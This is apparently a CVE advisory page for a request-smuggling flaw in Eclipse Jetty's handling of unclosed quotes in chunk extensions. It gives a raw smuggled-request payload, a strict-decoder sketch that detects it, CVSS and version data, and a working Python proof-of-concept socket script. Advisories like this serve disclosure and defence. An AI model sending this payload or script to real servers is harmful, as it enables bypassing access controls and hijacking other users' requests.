Security Vulnerability Report
CVE-2026-2332 CVSS 7.4 HIGH

CVE-2026-2332

Published: 2026-04-14 12:16:21
Last Modified: 2026-05-01 13:31:00

Description

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:

* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html

Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.

```
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked

1;ext="val
X
0

GET /smuggled HTTP/1.1
...
```

Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
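The following added example (not code from Jetty or from the advisory) contrasts the lenient behaviour described above, where the chunk header ends at the first CRLF even inside an open quote, with a strict decoder that applies the RFC 9112 chunk-ext grammar and rejects the message. The names `decode_chunked`, `is_rejected` and `SAMPLE` are hypothetical, and trailer fields are left unsupported to keep the sketch short.

```python
import re

# RFC 9112 section 7.1.1 grammar: CR and LF are valid in neither qdtext nor quoted-pair.
TOKEN = rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QDTEXT = rb"[\t \x21\x23-\x5b\x5d-\x7e\x80-\xff]"
QPAIR = rb"\\[\t \x21-\x7e\x80-\xff]"
QUOTED = rb'"(?:' + QDTEXT + rb"|" + QPAIR + rb')*"'
EXT = (rb"(?:[ \t]*;[ \t]*" + TOKEN +
       rb"(?:[ \t]*=[ \t]*(?:" + TOKEN + rb"|" + QUOTED + rb"))?)*")
CHUNK_LINE = re.compile(rb"([0-9A-Fa-f]+)" + EXT + rb"\r\n")

def decode_chunked(buf, strict=True):
    """Return (body, bytes left after the message); raise ValueError if malformed."""
    pos, body = 0, b""
    while True:
        if strict:
            m = CHUNK_LINE.match(buf, pos)
            if m is None:
                raise ValueError("malformed chunk header at offset %d" % pos)
            size, pos = int(m.group(1), 16), m.end()
        else:
            # Lenient model: the header stops at the first CRLF, open quote or not.
            eol = buf.index(b"\r\n", pos)
            size = int(buf[pos:eol].split(b";", 1)[0], 16)
            pos = eol + 2
        if size == 0:
            if buf[pos:pos + 2] != b"\r\n":
                raise ValueError("trailer fields are not handled in this sketch")
            return body, buf[pos + 2:]
        body += buf[pos:pos + size]
        if buf[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += size + 2

def is_rejected(buf):
    """True when the strict decoder refuses the chunked body."""
    try:
        decode_chunked(buf, strict=True)
        return False
    except ValueError:
        return True

# Constructed sample: the chunked body of the request shown in the description.
SAMPLE = (b'1;ext="val\r\nX\r\n0\r\n\r\n'
          b'GET /smuggled HTTP/1.1\r\nHost: localhost\r\n\r\n')

if __name__ == "__main__":
    print("lenient:", decode_chunked(SAMPLE, strict=False))
    print("strict rejects:", is_rejected(SAMPLE))
```

In the lenient result the bytes left over after the one-byte body are the `GET /smuggled` request, which the server would treat as a second request on the connection; the strict decoder never reaches that point.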

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

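cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (from 9.4.0 up to, excluding, 9.4.60) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (from 10.0.0 up to, excluding, 10.0.28) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (from 11.0.0 up to, excluding, 11.0.28) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (from 12.0.0 up to, excluding, 12.0.33) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (from 12.1.0 up to, excluding, 12.1.7) - VULNERABLE
Eclipse Jetty (see the official security advisory for the specific affected versions)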

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# PoC for CVE-2026-2332: Jetty Request Smuggling via Unclosed Quotes in Chunk Extensions
# This script sends a malicious request with an unclosed quote in the chunk extension.


def send_smuggling_request(host, port):
    # Construct the malicious payload
    # The chunk extension `1;ext="val` is not closed with a quote before CRLF
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "1;ext=\"val\r\n"  # Malformed chunk extension with unclosed quote
        "X\r\n"  # This part might be interpreted as the start of a smuggled request
        "0\r\n"  # Terminator
        "\r\n"
        "GET /smuggled HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload.encode('utf-8'))
        print(f"[+] Payload sent to {host}:{port}")
        print("[+] Check the backend server to see if the request was smuggled.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Replace with target host and port
    target_host = "localhost"
    target_port = 8080
    send_smuggling_request(target_host, target_port)
```

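References

* https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf
* https://gitlab.eclipse.org/security/cve-assignment/-/issues/89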

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2332", "sourceIdentifier": "[email protected]", "published": "2026-04-14T12:16:21.333", "lastModified": "2026-05-01T13:31:00.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at \\r\\n inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.60", "matchCriteriaId": "E0FB149B-EF33-4A51-9B96-030899E250CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.28", "matchCriteriaId": "361D419A-7A89-439A-99B1-D34E9914BAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.28", "matchCriteriaId": "7020D8E5-61DD-4DB6-82E4-EA46A96838A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.0.33", "matchCriteriaId": "E1A6095F-3D1E-40CB-A875-D41BF6C73EB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.1.0", "versionEndExcluding": "12.1.7", "matchCriteriaId": "B5A32954-7B03-46B6-9956-54BE0F8477E8"}]}]}], "references": [{"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}